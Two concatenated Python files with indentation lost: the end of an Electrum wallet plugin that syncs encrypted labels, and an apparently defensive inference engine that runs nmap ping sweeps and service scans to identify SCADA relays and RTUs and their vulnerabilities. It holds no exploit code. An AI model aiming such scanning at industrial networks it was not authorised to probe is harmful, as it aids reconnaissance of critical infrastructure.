password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
inference.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright (2021) Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# }}}
''''
Inference engine running bayseian probability analysis to detect device and it's vulnerabilities
'''
import sys
string_type = None
if sys.version_info[0] >= 3:
unicode = str
string_type = str
else:
string_type = basestring
import logging
logger = logging.getLogger(__name__)
DEBUG = True
def printD(m):
if DEBUG:
logger.debug(m)
import os
import json
from os import listdir
from os.path import isfile, join
from math import *
from io import open
import gevent
from gevent import socket as gsock
from gevent import sleep
from gevent.lock import BoundedSemaphore
from time import sleep
import time
import datetime
import multiprocessing
from multiprocessing import Manager
from ipaddress import ip_address, ip_network
import threading
from ..common.actor import Actor
try:
import yaml
except ImportError:
raise RuntimeError('PyYAML must be installed before running this script ')
import sqlite3
import json
from .Databases import dbManager
from . import decisionSimple
from . import helper
from . import identifyIP
from . import identifyVulnerabilities
from .identifyIP import IpIdentifier
# Database files
E_DB_FILE = "e_db.sqlite" # evidence
D_DB_FILE = "d_db.sqlite" # devices
V_DB_FILE = "v_db.sqlite" # vendors
VULN_DB_FILE = "vuln_db.sqlite" # vulnerabilities
EVENTS_DB_FILE = "events_db.sqlite" # events
S_DB_FILE = "s_db.sqlite" # status
R_DB_FILE = "r_db.sqlite" # requests
# Paths
scans_path = "ssasse_platform/InferenceEngine/Scans/"
vendor_profiles_path = "ssasse_platform/InferenceEngine/Profiles/Vendors"
device_profiles_path = "ssasse_platform/InferenceEngine/Profiles/Devices"
class DeviceIdentificationEngine(Actor):
def __init__(self, config, rmq_connection):
printD("InferenceEngine.__init__()")
super(DeviceIdentificationEngine, self).__init__(config, rmq_connection)
self.config = config
thread = threading.Thread(target=self.geventLoop, args=())
thread.daemon = True
self.newPortEvidenceQueue = gevent.queue.Queue()
self.vulnerabilityStatus = {}
self.identifiedVulnerabilities = {}
self.identifyIPQueue = multiprocessing.Queue()
self.identifyVulnQueue = multiprocessing.Queue()
self.DBManager = dbManager.DBManager()
self.IpIdentifier = identifyIP.IpIdentifier(self.config, self.DBManager, None)
self.ServiceProcessor = identifyVulnerabilities.ServiceProcessor(self.config, self.DBManager, None)
#self.processEvidenceGreenlet = gevent.spawn(self.geventLoop)
thread.start()
gevent.spawn(self.setup_subscriptions)
self.internal_range = self.config.internal_ip_range
if self.internal_range is None:
printD("inference -- ERROR: internal range not set. Defaulting to 192.168.0.0/24")
self.internal_range = "192.168.0.0/24"
self.ping_sweep_processed = set()
self.ipRangeScanStatus = dict()
self.publishActor = None
self.rmq_socket = self._connection._connection.socket
def setup_subscriptions(self):
#printD("InferenceEngine.setup_subscriptions()")
while not self.connection_ready:
gevent.sleep(0.01)
# Subscribe to receive evidence messages from Evidence Manager
subscriptions = [dict(prefix='new_packet', queue_name='new_packet_queue', callback=self.new_packet_callback),
dict(prefix='packet', queue_name='evidence_queue', callback=self.evidence_callback),
dict(prefix='internal', queue_name='internal_queue', callback=self.internal_callback),
dict(prefix="active.results", queue_name="active_results_queue", callback=self.active_callback)]
self.add_subscriptions(subscriptions)
def new_packet_callback(self, topic, message):
#printD("InferenceEngine.new_packet_callback() - Received: {0}, {1}".format(topic, message))
pass
def evidence_callback(self, topic, message):
printD("InferenceEngine.evidence_callback() - ip: {0}, evidence callback: {1}, {2}, CTR:{3}".format(message.get("TARGET_IPADDR", None), topic, message, message["CTR"]))
self.receiveEvidence(message, "Passive")
#self.receiveQueue.put((message, "Passive"))
def internal_callback(self, topic, message):
printD("InferenceEngine.internal_callback() - ip: {0}, internal callback: {1}, {2}".format(message.get("TARGET_IPADDR", None), topic, message))
self.receiveEvidence(message, "Internal")
#self.receiveQueue.put((message, "Internal"))
def active_callback(self, topic, message):
printD("InferenceEngine.active_callback() - ip: {0}, active callback: {1}, {2}".format(message.get("TARGET_IPADDR", None), topic, message))
mysteryDevice = message["TARGET_IPADDR"]
siteName = self.getSiteName(mysteryDevice)
fromWho = "Active"
if siteName != "NA":
fromWho = fromWho + " ({0})".format(siteName)
if message['SCAN_NAME'] == 'nmap_arp_ping_scan':
printD("PING Got result for nmap_arp_ping_scan")
ipRange = message['TARGET_IPADDR']
self.ipRangeScanStatus[ipRange]["PROCESSING"] = False
self.ipRangeScanStatus[ipRange]["ACTIVE_SCAN_TIME"] = 0
storedDevices = dbManager.allIdentifiers(E_DB_FILE)
# Add IP as separate evidence
scanResult = message['DISCOVERED_TARGETS']
for ip, stats in scanResult.items():
printD("PING: IP:{}, stats: {}".format(ip, stats))
if ip not in storedDevices:
msg = stats
msg['TARGET_IPADDR'] = ip
printD("PING Adding IP to receiveEvidence: IP: {}, msg: {}".format(ip, msg))
self.receiveEvidence(msg, fromWho)
else:
self.DBManager.removeKey(E_DB_FILE, mysteryDevice, "ACTIVE_SCAN_TIME")
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"ACTIVE_SCAN_TIME": ["0"]})
self.receiveEvidence(message, fromWho)
#self.receiveQueue.put((message, fromWho))
#####
#
#####
def getSiteName(self, mysteryDevice):
fr = open("{0}zonemap.json".format(scans_path), "r", encoding="utf-8")
zonemap = json.loads(fr.read())
fr.close()
siteName = "NA"
for key,val in zonemap.items():
# Exact IP match
if mysteryDevice in val:
return key
for key,val in zonemap.items():
# Check if IP in range
for ip in val:
try:
ipObj = ip_address(mysteryDevice)
netObj = ip_network(ip)
if ipObj in netObj:
return key
except Exception as e:
#printD("checking zonemap for ip warning: {0}".format(e))
pass
return "NA"
##########################################################
# vendorMap
##########################################################
def vendorMap(self, vendor):
#printD("InferenceEngine.vendorMap()")
v_names = dbManager.allIdentifiers(V_DB_FILE)
for realVen in v_names:
if helper.singleInList(vendor, dbManager.select(V_DB_FILE, realVen)["VENDOR"]):
vendor = realVen
break
return vendor
##########################################################
# modelMap
##########################################################
def modelMap(self, model):
#printD("InferenceEngine.modelMap()")
d_names = dbManager.allIdentifiers(D_DB_FILE)
for realDev in d_names:
if helper.singleInList(model, dbManager.select(D_DB_FILE, realDev)["MODEL"]):
model = realDev
break
return model
#####
#
#####
def spawnIdentifyProcess(self, mysteryDevice):
resultsDict = {}
resultsDict["device"] = mysteryDevice
printD("spawnIdentifyProcess")
resultsDict = self.IpIdentifier.identifyIP(mysteryDevice, resultsDict, self.rmq_socket)
if resultsDict is not None:
self.identifyIPQueue.put(resultsDict)
#####
#
#####
def identifyProcess(self, mysteryDevice):
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["y"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "n")
p = multiprocessing.Process(target=self.spawnIdentifyProcess, args=[mysteryDevice])
p.start()
#####
#
#####
def getFromIPQueue(self):
if not self.identifyIPQueue.empty():
resultsDict = self.identifyIPQueue.get()
mysteryDevice = resultsDict["device"]
for internal in resultsDict["internal"]:
self.receiveEvidence(internal, "Internal")
for external in resultsDict["external"]:
printD("publishing ip: {0}, external: {1}".format(mysteryDevice, external))
#self.publishActor.publish_request(external["ACTIVE_REQUEST_STRING"], external["SCAN"])
self.publish_messages.append((external["ACTIVE_REQUEST_STRING"], external["SCAN"]))
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["n"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "y")
##########################################################
# startNmapScan:
##########################################################
def startNmapScan(self, device, ports):
prevStatus = {}
prevStatus["device"] = device
prevStatus["port"] = ports
prevStatus["nmap"] = 'yes'
p = multiprocessing.Process(target=self.spawnProcessServiceForNmap, args=(device,ports, prevStatus))
p.start()
def spawnProcessServiceForNmap(self, device, ports, prevStatus):
printD("SN: spawnProcessServiceForNmap: {}, {}, {}".format(device, ports, prevStatus))
currentStatus = self.ServiceProcessor.processNmap(device, ports, prevStatus, self.rmq_socket)
# Put currentStatus in the multiprocess queue
self.identifyVulnQueue.put(currentStatus)
##########################################################
# identifyVulnerability:
##########################################################
def identifyVulnerability(self, device, port, service):
self.DBManager.insert(E_DB_FILE, device, {"PROCESSING": ["y"]})
self.DBManager.removeVal(E_DB_FILE, device, "PROCESSING", "n")
prevStatus = {}
identified = 'n'
for ip_port in dbManager.select(S_DB_FILE, "VULN_IDENTIFIED").get("IP_PORT", []):
ip, pt = ip_port.split('_')
if ip == device and port == pt:
identified = 'y'
break
prevStatus['device'] = device
prevStatus['port'] = port
prevStatus['identified'] = identified
prevStatus['nmap'] = 'done'
p = multiprocessing.Process(target=self.spawnProcessService, args=(device,port,service,prevStatus))
p.start()
def spawnProcessService(self, device, port, service, prevStatus):
currentStatus = None
currentStatus = self.ServiceProcessor.processService(device, port, service, prevStatus, self.rmq_socket)
# Put currentStatus in the multiprocess queue
if currentStatus is not None:
self.identifyVulnQueue.put(currentStatus)
##########################################################
# getFromVulnQueue: Get results from process queue and store it locally
##########################################################
def getFromVulnQueue(self):
if not self.identifyVulnQueue.empty():
resultsDict = self.identifyVulnQueue.get()
mysteryDevice = resultsDict["device"]
for internal in resultsDict["internal"]:
self.receiveEvidence(internal, "Internal")
for external in resultsDict["external"]:
printD("publishing ip: {0}, external: {1}".format(mysteryDevice, external))
#self.publishActor.publish_request(external["ACTIVE_REQUEST_STRING"], external["SCAN"])
self.publish_messages.append((external["ACTIVE_REQUEST_STRING"], external["SCAN"]))
port = resultsDict["port"]
identified = 'n'
if "identified" in resultsDict.keys():
identified = resultsDict["identified"]
if identified == 'y':
ip_port = "{}_{}".format(mysteryDevice, port)
self.DBManager.insert(S_DB_FILE, "VULN_IDENTIFIED", {"IP_PORT": [ip_port]})
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["n"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "y")
vulnProtocols = self.getVulnerabilityPorts(mysteryDevice)
printD("SN: ***IdentifiedVulnerabilities device: {}, ports: {}".format(mysteryDevice, vulnProtocols))
#printD("Identified Vulnerabilities: {}".format(self.identifiedVulnerabilities))
##########################################################
# geventLoop()
##########################################################
def geventLoop(self):
printD("InferenceEngine.geventLoop()")
while not self.connection_ready:
time.sleep(0.01)
self.publish_message("inference.start", {})
peekScanTime = time.time()
while True:
time.sleep(0.01)
# print out debug info
printD("inference.geventLoop() - identified: {0}".format(dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", [])))
########## DEVICE IDENTIFICATION ##########
self.processIdentification()
########## SERVICE PROCESSING / VULNERABILITY ##########
self.processVulnerabilities()
########## GET FROM MULTIPROCESSING IP QUEUE ##########
self.getFromIPQueue()
########## GET FROM MULTIPROCESSING VULNERABILITY QUEUE ##########
self.getFromVulnQueue()
userInput = self.checkForPingSweepUserInput()
if userInput:
printD("PING: Sending ping sweep: {}".format(userInput))
self.ping_sweep_handler(userInput)
currentTime = time.time()
if currentTime - peekScanTime >= 30:
printD("PING: Checking for ExternalIPs")
devices = self.checkForExternalIPs()
printD("PING: Device list from checkForExternalIPs: {}".format(devices))
peekScanTime = currentTime
# Should be from frontend, but for testing purposes
# ipRangeList = ['172.17.0.0/28']
# self.ping_sweep_handler(ipRangeList)
if len(devices) > 0:
requestTimeStamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")
requestDict = {}
requestDict["MESSAGE"] = ["PING: Device list from checkForExternalIPs: {}".format(devices)]
self.DBManager.insert(R_DB_FILE, requestTimeStamp, requestDict)
##########################################################
# processIdentification()
##########################################################
def processIdentification(self):
printD("inference.geventLoop() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
if not self.newPortEvidenceQueue.empty():
printD("inference.geventLoop() - VULN_QUEUE: {0}".format(self.newPortEvidenceQueue.peek()))
########## IDENTIFICATION ###########
# Go through evidenceIP queue, find IP that has new evidence waiting
# remove from list
mysteryDevice = False
for mD in dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", []):
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if self.ipInPolicy(mD) and (("PROCESSING" not in mysteryEvidence.keys()) or ("PROCESSING" in mysteryEvidence.keys() and "n" in mysteryEvidence["PROCESSING"] and "y" not in mysteryEvidence["PROCESSING"])):
mysteryDevice = mD
break
# If no new evidence, go through IPs currently in an active scan
# (so we can see if timeout has passed)
if mysteryDevice == False:
devices = dbManager.allIdentifiers(E_DB_FILE)
for mD in devices:
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if self.ipInPolicy(mD) and "ACTIVE_SCAN_TIME" in mysteryEvidence.keys() and "0" not in mysteryEvidence["ACTIVE_SCAN_TIME"] and mysteryDevice not in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
mysteryDevice = mD
break
# run identification process on the chosen IP (mysteryDevice)
if mysteryDevice != False:
if mysteryDevice not in dbManager.select(S_DB_FILE, "DECK").get("IP", []):
self.DBManager.removeVal(S_DB_FILE, "ID_QUEUE", "IP", mysteryDevice)
else:
self.DBManager.removeVal(S_DB_FILE, "DECK", "IP", mysteryDevice)
printD("identifyProcess")
self.identifyProcess(mysteryDevice)
#####
#
#####
def checkForExternalIPs(self):
externalDevices = []
devices = dbManager.allIdentifiers(E_DB_FILE)
for device in devices:
ipAddr = ip_address(device)
ipNetwk = ip_network(self.internal_range)
if ipAddr not in ipNetwk and ipAddr not in self.ping_sweep_processed:
printD("PING: ipAddr: {0} not in ipNetwk: {1}".format(ipAddr, ipNetwk))
self.ping_sweep_processed.add(ipAddr)
externalDevices.append(device)
return externalDevices
def checkForPingSweepUserInput(self):
allRequestTimeStamps = dbManager.allIdentifiers(R_DB_FILE)
for requestTimeStamp in allRequestTimeStamps:
requestDict = dbManager.select(R_DB_FILE, requestTimeStamp)
if "DONE" not in requestDict and "PINGSWEEP" in requestDict:
printD("geventLoop() Ping sweep timestamp: {0}, response: {1}".format(requestTimeStamp, requestDict["PINGSWEEP"]))
self.DBManager.insert(R_DB_FILE, requestTimeStamp, {"DONE": ["Y"]})
return requestDict["PINGSWEEP"]
return None
def ping_sweep_handler(self, ipRangeList):
#targetPorts = '21-23,80,443,502,20000'
for ipRange in ipRangeList:
# Check if input format is correct
runScan = True
if ipRange in self.ipRangeScanStatus.keys() and "PROCESSING" in self.ipRangeScanStatus[ipRange].keys():
timeElapsed = self.ipRangeScanStatus["ACTIVE_SCAN_TIME"]
# Scan is under process and maximum time has not elapsed
if timeElapsed < 100:
runScan = False
if runScan == True:
# Get scan parameters
categoryName = "network_scan"
scan = self.IpIdentifier.getScanWithoutPolicyCheck("nmap_arp_ping_scan", ipRange, {})
printD("PING: Scan parameters for nmap_arp_ping_scan: {}".format(scan))
if scan == "NA":
return scan
scan["PARAMS"]["SCAN_NAME"] = "nmap_arp_ping_scan"
scan["PARAMS"]["TARGET_IPADDR"] = ipRange
# scan["TARGET_PORTS"] = targetPorts
if ipRange not in self.ipRangeScanStatus.keys():
self.ipRangeScanStatus[ipRange] = dict()
self.ipRangeScanStatus["PROCESSING"] = True
self.ipRangeScanStatus["ACTIVE_SCAN_TIME"] = time.time()
# siteName from zonemap, which came from user
siteName = self.getSiteName(ipRange)
# Kick off new ping sweep scan
if siteName != "NA":
printD("PING: Sending requestScan: ipRange: {}, scan: {} and siteName: {}".format(ipRange, scan, siteName))
# self.IpIdentifier.requestScan(ipRange, scan, siteName)
# TODO add ping sweep status/history to webpage somehow
# self.publish_request("active.requests.{0}".format(siteName), scan["PARAMS"])
self.publish_messages.append(("active.requests.{0}".format(siteName), scan["PARAMS"]))
def processVulnerabilities(self):
###################################################################
# If the device has been identified, then newPortEvidenceQueue will
# not be empty because it will be ready to process the ports and
# services it supports to check for vulnerabilities.
###################################################################
mysteryDevice = False
port = 0
service = 0
IP_PORT_SERVICE = None
ips = dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", [])
printD( "VULN_QUEUE len: {}, entries: {}".format(len(ips), ips))
for ip_port_service in dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", []):
printD("SN: Retrieving from VULN_QUEUE db {}".format(ip_port_service))
mD, port, service = ip_port_service.split('|')
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if ("PROCESSING" not in mysteryEvidence.keys()) or ("PROCESSING" in mysteryEvidence.keys() and "n" in mysteryEvidence["PROCESSING"] and "y" not in mysteryEvidence["PROCESSING"]):
mysteryDevice = mD
IP_PORT_SERVICE = ip_port_service
break
# If no new evidence, go through IPs currently in an active scan
# (so we can see if timeout has passed)
if mysteryDevice == False:
devices = dbManager.allIdentifiers(E_DB_FILE)
for mD in devices:
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if "ACTIVE_SCAN_TIME" in mysteryEvidence.keys() and "0" not in mysteryEvidence["ACTIVE_SCAN_TIME"] and "nmap_service_scan" in dbManager.select(E_DB_FILE, mD).get("SCAN_NAME", []):
#mysteryDevice = mD
protocols = self.getProtocols(mD)
# Check if port done with vulnerabilities check
try:
vulnProtococols = self.getVulnerabilityPorts(mD)
keys_to_delete = []
for k, p in protocols.items():
if p in vulnProtococols:
keys_to_delete.append(k)
for k in keys_to_delete:
del protocols[k]
except KeyError:
pass
for p, s in protocols.items():
port = p
service = s
break
if p != 0 and service != 0:
mysteryDevice = mD
break
# run identify vulnerability process on the chosen IP (mysteryDevice), PORT and SERVICE
if mysteryDevice != False:
printD("SN: Found ip port to scan: IP: {}, PORT: {}, SERVICE: {}, IP_PORT_SERVICE: {}".format(mysteryDevice, port, service, IP_PORT_SERVICE))
if IP_PORT_SERVICE is None:
IP_PORT_SERVICE = "{}|{}|{}".format(mysteryDevice, port, service)
self.DBManager.removeVal(S_DB_FILE, "VULN_QUEUE", "IP_PORT_SERVICE", IP_PORT_SERVICE)
self.identifyVulnerability(mysteryDevice, port, service)
##########################################################
# Get Ports from evidence, vendor profile and device profile
##########################################################
def getProtocols(self, mysteryDevice):
mysteryEvidence = dbManager.select(E_DB_FILE, mysteryDevice)
#printD("getPorts: {}".format(mysteryEvidence))
vendor = mysteryEvidence.get('VENDOR', None)
#if vendor is None or vendor[0].upper() not in ['SEL', 'GE']:
# printD("getPorts for {} returning since vendor is not SEL:{}".format(mysteryDevice, vendor))
# return {}
model = mysteryEvidence.get('MODEL', None)
protocols = {}
# Check for ports info in the evidence
if "PROTOCOLS" in mysteryEvidence:
for scada_protocol in mysteryEvidence["PROTOCOLS"]:
if "{0}_PORT".format(scada_protocol) in mysteryEvidence:
protocols[scada_protocol] = mysteryEvidence["{0}_PORT".format(scada_protocol)]
if vendor is not None:
v = self.vendorMap(vendor[0]).upper()
printD("SN: VENDORMAP: INPUT: {}, MAPPED: {}".format(vendor[0], v))
# Read from vendor profile
vendorPath = "{0}/{1}.json".format(vendor_profiles_path, v)
protocols = self.getProtocolsFromProfile(vendorPath)
if model is not None:
m = self.modelMap(model[0]).upper()
printD("SN: MODELMAP: INPUT: {}, MAPPED: {}".format(model[0], m))
# Read from device profile
if m.upper() == "CONTROLWAVEREMOTEIO":
m = "ControlWaveRemoteIO"
modelPath = "{0}/{1}.json".format(device_profiles_path, m)
modelProtocols = self.getProtocolsFromProfile(modelPath)
protocols.update(modelProtocols)
return protocols
##########
#
##########
def getProtocolsFromProfile(self, profilePath):
try:
fr = open(profilePath, "r", encoding="utf-8")
profileConfig = json.loads(fr.read())
fr.close()
except IOError as e:
printD("ERROR Cannot open file: {}".format(e))
return {}
protocols = {}
printD("profile Config: {}".format(profileConfig))
services = profileConfig.get("SERVICES", {})
scada = profileConfig.get("SCADA", {})
services.update(scada)
for service, prts in services.items():
printD("service: {}, ports: {}".format(service, prts))
try:
service_key = service + "_TCP"
protocols[service_key] = prts["TCP"][0]
except (KeyError, IndexError):
pass
try:
service_key = service + "_UDP"
protocols[service_key] = prts["UDP"][0]
except (KeyError, IndexError):
pass
printD("getFromProfile: {}".format(protocols))
return protocols
#####
#
#####
def processSignature(self, signature, ttl):
partialEvidence = {}
relays = []
rtus = []
d_devices = dbManager.allIdentifiers(D_DB_FILE)
for device in d_devices:
profile = dbManager.select(D_DB_FILE, device)
device_type = profile.get("DEVICE_TYPE", None)
if device_type is not None:
if "TCP_SIG" in profile.keys() and "TTL" in profile.keys():
if helper.singleInList(signature, profile["TCP_SIG"]) and helper.singleInList(ttl, profile["TTL"]):
if device_type[0] == "relay":
relays.append(profile)
elif device_type[0] == "rtu":
rtus.append(profile)
if len(relays) == 0 and len(rtus) > 0:
if len(rtus) == 1 and "MODEL" in rtus[0].keys() and False:
partialEvidence["MODEL"] = rtus[0]["MODEL"][0]
if "VENDOR" in rtus[0].keys():
partialEvidence["VENDOR"] = rtus[0]["VENDOR"][0]
partialEvidence["DEVICE_TYPE"] = "rtu"
elif len(rtus) == 0 and len(relays) > 0:
if len(relays) == 1 and "MODEL" in relays[0].keys() and False:
partialEvidence["MODEL"] = relays[0]["MODEL"][0]
if "VENDOR" in relays[0].keys():
partialEvidence["VENDOR"] = relays[0]["VENDOR"][0]
partialEvidence["DEVICE_TYPE"] = "relay"
printD("inference.processSignature() - partialEvidence: {0}".format(partialEvidence))
return partialEvidence
#####
#
#####
def ipInPolicy(self, mysteryDevice):
fr = open("{0}policy.json".format(scans_path), "r", encoding="utf-8")
policy = json.loads(fr.read())
fr.close()
if mysteryDevice in policy.keys():
return True
else:
for key in policy.keys():
if key != "default":
try:
ipObj = ip_address(mysteryDevice)
netObj = ip_network(key)
if ipObj in netObj:
return True
break
except Exception as e:
#printD("checking policy for ip warning: {0}".format(e))
pass
printD("ipInPolicy() - ip: {0} not in policy".format(mysteryDevice))
return False
##########################################################
# receiveEvidence(evidence)
# get all existing evidence for this IP from DB
# determine which recent evidence is NEW
# add new evidence to DB (as is, no sanitize)
# if IP not in queue, add it
##########################################################
def receiveEvidence(self, rawEvidence, fromWho = ""):
# get mysteryDevice (IP)
if "TARGET_IPADDR" not in rawEvidence.keys():
return False
mysteryDevice = rawEvidence["TARGET_IPADDR"]
rawEvidence = helper.breakDownDict(rawEvidence, "", {})
#if mysteryDevice == "172.17.0.13" and "SCAN_NAME" in rawEvidence.keys() and "http_TCP_header_probe" == rawEvidence["SCAN_NAME"]:
# printD("Returning 172.17.0.13 header probe")
# return False
existingEvidence = {}
newEvidence = {}
# first occurence of device
e_devices = dbManager.allIdentifiers(E_DB_FILE)
if mysteryDevice not in e_devices:
printD("receive() - ip: {0}, FIRST".format(mysteryDevice))
rawEvidence["PROCESSING"] = "n"
rawEvidence["ACTIVE_SCAN_TIME"] = "0"
else:
existingEvidence = dbManager.select(E_DB_FILE, mysteryDevice)
for rawKey,rawVal in rawEvidence.items():
rawKey = str(rawKey).strip()
if isinstance(rawVal, string_type) or isinstance(rawVal, int) or isinstance(rawVal, float):
rawVal = str(rawVal).strip()
pass
else:
# handle eventually
continue
# ignore
if rawKey in ["DEST_PORT", "SOURCE_PORT", "CTR"] or rawKey.startswith("STATUS") or len(rawVal) < 1 or helper.compareSingle(rawVal, "none"):
continue
# conversions
if rawKey == "PROTOCOL":
rawKey = "PROTOCOLS"
# vendor mapping
if rawKey == "VENDOR":
oldVal = rawVal
rawVal = self.vendorMap(rawVal)
printD("receiveEvidence - ip: {0}, rawVendor: {1}, vendorMap: {2}".format(mysteryDevice, oldVal, rawVal))
# model mapping
modelKeys = ["MODEL", "PART_NO", "DEVICE_NAME"]
if rawKey in modelKeys:
oldVal = rawVal
if "MODEL" not in newEvidence.keys():
newEvidence["MODEL"] = []
rawVal = self.modelMap(rawVal)
newEvidence["MODEL"].append(rawVal)
printD("receiveEvidence - ip: {0}, rawModel: {1}, modelMap: {2}".format(mysteryDevice, oldVal, rawVal))
# signature processing
if rawKey == "TCP_SIG" and "TTL" in rawEvidence.keys():
partialEvidence = self.processSignature(rawVal, rawEvidence["TTL"])
for partialKey,partialVal in partialEvidence.items():
if partialKey not in newEvidence.keys():
newEvidence[partialKey] = []
newEvidence[partialKey].append(partialVal)
# new key
if rawKey not in existingEvidence.keys():
if rawKey not in newEvidence.keys():
newEvidence[rawKey] = []
if rawVal not in newEvidence[rawKey]:
newEvidence[rawKey].append(rawVal)
# existing key, new val
elif not helper.singleInList(rawVal, existingEvidence[rawKey]):
if rawKey not in newEvidence.keys():
newEvidence[rawKey] = []
if rawVal not in newEvidence[rawKey]:
newEvidence[rawKey].append(rawVal)
if len(newEvidence.keys()) > 0:
printD("receive() - ip: {0}, EXISTING: {1}, NEW: {2}".format(mysteryDevice, existingEvidence, newEvidence))
# add event to events DB - only for passive/active
if "Passive" in fromWho or "Active" in fromWho:
eventTimestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")
event = {}
event["TYPE"] = ["IDENTIFICATION"]
event["TARGET_IPADDR"] = [mysteryDevice]
if "Passive" in fromWho:
event["SIGNATURE"] = ["Passive"]
if "PROTOCOL" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["PROTOCOL"]]
elif "PROTOCOLS" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["PROTOCOLS"]]
